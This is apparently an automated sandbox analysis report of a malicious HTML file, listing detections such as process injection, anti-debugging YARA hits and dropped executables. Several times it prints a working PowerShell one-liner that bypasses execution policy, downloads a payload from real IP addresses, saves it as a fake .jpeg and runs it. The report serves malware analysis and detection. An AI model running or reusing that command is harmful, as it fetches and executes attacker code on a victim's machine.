LEKMANLIADPKQDJOLPBCBJPP>MBBJGQBEGFJFOHIQDJLJ?OQHGDPFOK?FEF>ACQJN?NBM@CKAJ>FF?>M?NJHM@ACDQEK>IKKMI>FJ@GGGNI>F@IDKECBCF?KL>BHJBPF>PPP@KHOBOONBIGFMQLI?HNMILIMANQLMPQQ?EECNO?L>GK?HGFOKFQ?CG@LQGKALILE?DNJMH?EHKPPPOMLOBIKKIQDBBBKABFC>KLBGOM@BJK@JAHBQNQON>H@PPIAQNDL@NBM
Data received	?D@CKF>?BQCIDLE?CQJCKAIPDPDG@KI?INIFNCI?ED?CNOF>@>C@I>BQ>OGMMPPJI@>EIMCBIONEQD@?GIKMBGNC?NPFJLIBNB?BDDGMPKIGKFE>NQIE>D@>O?>MCEEO@>AJG@AGLGMENI>KHBN@LAEQBLFGFEIH@OGJJHPBCDNNHIEHMNJJHE@QFNMKG?AHILJ@@JDKBPAQCDAQLJ>GE?@>MM@?ED>MACENKPCMNQ?LHDIF>BLNGKNMB?@LHDN@JPEIFAB@QMMJCBGM@@E??CFQEGAA@C?DJC?DC?@@JKLF?ALFGF?L?FC@@CDB?JBEEK>>G?CPINCAEG>?EGIFA@FJE>OCG?BDJDB@HLOALLOK?JP?IHP@IQH>LBFMLHQPGB>NOQMFEMFBC@NC@I@>AJBM?O>QHD??I>E@@LA@@>IMDFKDBBPPBK?JB>@JKCCELA>E>Q@QIKLIKOHF@?@Q?LHJMCPJPOMOGID@KLJCBHGCPMNHHKGI@DHI@@HAQOBFJ@PHHAAKHO?CFNDPNFM>JEHKBJIOQLFGMH?GG@CHQKQLIPFQHJQBQCPOGFMMEPCAQGDCFC@LMI?@GD?NKBFDQEOHGKQJMMF@PQQDG>?HJAOHLF?QKM?CNDNLLDFCOQPBQHCFDMIALKNK@FQEQGGKFNNBPPMEFMIHFJNG?OOAGAHOQAQD@@@C>K@M?@AHACECJABH@GCEGNJMJCN?@OMBH?OQCQMJBECGKKL@LBPLICJMQCCECJHLQC@PANHQPDGQ?QCNQDKPNE@PKFQ>?O@BPKEQ?C@QENNFKF?DEOEHL?@EAO?GBJC@GQAHCLNGM@ODFLQODJOP@P>FMBIIMJFOHFOAOKCLNDQNPCKGNKKMJQK@CC>PEJHN?HFH?IHFD>AANNLGEN@@>Q>>FLQ@>POODFAHAQBJII@ALAFLQDBCPMOLAMM@G>>C?IE?AGDKAECF?LDH>LFKMKCM@LCBD@IPFHCHG?OO?O@?MECJQ>HDOOJJBMPBOKOINCJDKCD?QGJOAE>DPFOAKNHOIKQBFK@CEA>JFBFKPOBGNCB?P@BMND>DIMAMKLQBOKJDH>KFOBKLPGQ@PHLPNAEHHQAKDQQAPAFNHCLGJPFFHCHAHO>QHBO>LOCEDOOGJO>LAHFBGEHE>MLQB>FQAQKGA>NHQLPD?BO@JHPDA>NNKDBO?OMHHMGDG@??NJFCINDJFQENIGDBQOCQNNB?BHOQJKOJL>>OI@M>COCHQLOENHHFOH@GILHHI>GGONLPKJAHFJOHHJCBPKJPMM>NPLNPNQF>EBMAJP>FOLIOBOOFE>@>PICECHQPNJGKNBKLIQEACQDBMFC?OFGC@ABQFJAL@BJ>FAMDDOLNDCH@AGJJDGAGCE>LAO?G@ODJDBB>GBBLA>JP@FMOKCIGEIJJ>IK>FFJDD?DH?@HOEFEP@>JCJEBL@FHJO>JOOQG?FBNMGJIIHO@LQMBO?FMDIN?GDEN?QPDKDCJHOG>MEMH?FPQAD>IA>@JHQ@PQ?NNFFOIK@AMFLJCNC?>@OACMDJHIMDIOMAPG>BK@DFIBFKHCIFA?LMBHPBH>LIDEPIMEHNC@OFPP?ICEOFKBQNEDH?KOOIFBJGLG@FDDCP??JQKQA?QBF>QE>IF@AOAM?ICHLA?O>O>?DQLCAGBFM?HKPEKMJILOOEQBAEELHPHO@CCJLCIPEAQPPA?HNNKJOJIE?BBQEDLLGFMQGAPMH@MPO?>KJDEGQAHHEOKHQLPJMBJLHAJCP>MQH>MHJCLIH>I>FJPHIAQLEM?NDLFG?LHMGFPPAPOHCQGIOKPPQ>GCLNNPOEANKG@GKMAPKOA?>EEP?PGHEPOM@I@>EBQ@LI>FDNP?EPKFBPA@FHBCCGOL>KMDHML>PDLQPKH?KLBB@N@EEFPL?MPEDBLABBNDFIQFELKPKJLDGKHAGFCICMMKBF@PCIQGN@IQH>GAMOPJ@NOAPNDIMCCEO@P@IG@LFCOGKGDEKOGPMQ>@CHQOPAKFGBKEEQO?L>PQG>QIN@LKENPMJMEODPCLCCCI?EQ?J>MMNONILDNCHMKK?IJEIN@QAQANPIHOHPE>I>IHD?BBJHKF@NCFMNNHDL@>MJNELH@ENPHKQOKBG>?DFG?OF>FD>EOAFD>ODLCLGABF?P>JCF?NGOIG>H>OGDLQEK?EMJKHOQMLLLPCL?J?D>@IOKQFQEQHQLABIOIHOCNOHIAQBQQG@FFIAAN>B@JPQPB>OB?DKLO?I?BLODQCMFLKNNOOADMMQLKCJ?IINHOON>NNHKM@GL@PACGDJPIK@BDLHHOH>EEC?FDCED>PHLIOLNLGJPHPFND>GQKI?M>?@@OMCMELNPOFFGK?AFGCKLJOHEHHEHE?AMBBCOPIJEMPBKDOLKPIEH?KB>D>DCIFJCHLLJJOGBNF>?PMOEMNJJLMAD@DDCGIK>OECEQQEQP>LEPHDDCKFBB?JF>I?BAPLCBI@DF@?LNMOQOCBCMGIDPGOO@MCBDHOPAN>CGBAAPNCCDDO@GLFDJCNC@D@NIBLKJHBELQIMGAEIOCNAEOAAEBODJL?@QP?F>HN>KB?DA@QCANC?F@Q>>CJBG>LFGGANBOIOGLIPK@JGLAIOHHAJPPAI@NEG@KFP>NMPNHABH@LONFNFB>GIN?@GPFNCCEBFL?NCMLHEOE?MJGPQQ@I@?HP@K?Q>NBCHGJJQKEBKA@@K?LEIDO@ADLANHKM?>BGLGBFBNBPB>OMF@EKGJPI@CQ?EFAAEKPACOPJH>EMEMJIEF@I@LIL?ECPEJFIMI?>DAMIAPAONLLPJKEHIONLGPGD?KPPHMMHBIMP@AP>CB@E?MJ>BGBQEKLQLCF@M>D>DDHKLGAFJM>DEOBBIA@CFPHKLAEOCPA>MKD@QBHK@NIKHAB@>JKBGNQCE?>CIMI

Poweshell is sending data to a remote host (2 events)

Data sent	GET /images/bird.png HTTP/1.1 Host: 94.140.115.0 Connection: Keep-Alive
Data sent	GET /images/bird.png HTTP/1.1 Host: 198.252.108.121 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Nov. 18, 2021, 1:45 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Nov. 18, 2021, 1:45 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1408 CREDAT:145409

Communicates with host for which no DNS query was performed (2 events)

host	198.252.108.121
host	94.140.115.0

Drops a binary and executes it (2 events)

file	C:\ProgramData\Google.jpeg
file	C:\ProgramData\Google1.jpeg

A command shell or script process was created by an unexpected parent process (2 events)

parent_process	iexplore.exe				martian_process	powershell.exe -ex bypass -nop (New-Object System.Net.WebClient).DownloadFile('http://94.140.115.0/images/bird.png','C:\ProgramData\Google.jpeg');Sleep -s 5;cmd /c start 'C:\ProgramData\Google.jpeg'
parent_process	iexplore.exe				martian_process	powershell.exe -ex bypass -nop (New-Object System.Net.WebClient).DownloadFile('http://198.252.108.121/images/bird.png','C:\ProgramData\Google1.jpeg');Sleep -s 5;cmd /c start 'C:\ProgramData\Google1.jpeg'

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send Nov. 18, 2021, 1:45 p.m.	buffer: GET /images/bird.png HTTP/1.1 Host: 94.140.115.0 Connection: Keep-Alive socket: 1256 sent: 77	1	77	0
send Nov. 18, 2021, 1:45 p.m.	buffer: GET /images/bird.png HTTP/1.1 Host: 198.252.108.121 Connection: Keep-Alive socket: 1264 sent: 80	1	80	0

One or more non-whitelisted processes were created (6 events)

parent_process	iexplore.exe	martian_process	powershell.exe -ex bypass -nop (New-Object System.Net.WebClient).DownloadFile('http://94.140.115.0/images/bird.png','C:\ProgramData\Google.jpeg');Sleep -s 5;cmd /c start 'C:\ProgramData\Google.jpeg'
parent_process	iexplore.exe	martian_process	powershell.exe -ex bypass -nop (New-Object System.Net.WebClient).DownloadFile('http://198.252.108.121/images/bird.png','C:\ProgramData\Google1.jpeg');Sleep -s 5;cmd /c start 'C:\ProgramData\Google1.jpeg'
parent_process	iexplore.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bypass -nop (New-Object System.Net.WebClient).DownloadFile('http://198.252.108.121/images/bird.png','C:\ProgramData\Google1.jpeg');Sleep -s 5;cmd /c start 'C:\ProgramData\Google1.jpeg'
parent_process	iexplore.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bypass -nop (New-Object System.Net.WebClient).DownloadFile('http://94.140.115.0/images/bird.png','C:\ProgramData\Google.jpeg');Sleep -s 5;cmd /c start 'C:\ProgramData\Google.jpeg'
parent_process	powershell.exe	martian_process	"C:\Windows\system32\cmd.exe" /c start C:\ProgramData\Google.jpeg
parent_process	powershell.exe	martian_process	"C:\Windows\system32\cmd.exe" /c start C:\ProgramData\Google1.jpeg

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1408 resumed a thread in remote process 2252
NtResumeThread Nov. 18, 2021, 1:37 p.m.	thread_handle: 0x000000000000035c suspend_count: 1 process_identifier: 2252	1	0	0

Creates a suspicious Powershell process (12 events)

option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
value	Uses powershell to execute a file download from the command line
option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
value	Uses powershell to execute a file download from the command line
option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
value	Uses powershell to execute a file download from the command line
option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
value	Uses powershell to execute a file download from the command line

The process powershell.exe wrote an executable file to disk (22 events)

file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\ProgramData\Google.jpeg
file	C:\Windows\System32\cmd.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\ProgramData\Google1.jpeg

balzak.html

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All